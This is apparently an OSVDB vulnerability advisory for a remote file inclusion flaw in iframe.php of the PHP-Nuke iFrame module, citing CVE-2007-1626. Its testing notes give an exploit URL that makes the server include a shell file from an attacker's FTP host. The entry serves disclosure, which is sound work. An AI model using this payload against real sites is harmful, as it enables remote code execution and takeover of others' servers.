iFrame Module for PHP-NUKE iframe.php file Variable Remote File Inclusion

2007-03-18T00:00:00
ID OSVDB:37222
Type osvdb
Reporter OSVDB
Modified 2007-03-18T00:00:00

Description

Manual Testing Notes

http://[target]/nuke_path/iframe.php?file=ftp://user:pass@[attacker]/public_html/shell.html

References:

ISS X-Force ID: 33060 Generic Exploit URL: http://www.milw0rm.com/exploits/3512 CVE-2007-1626 Bugtraq ID: 23038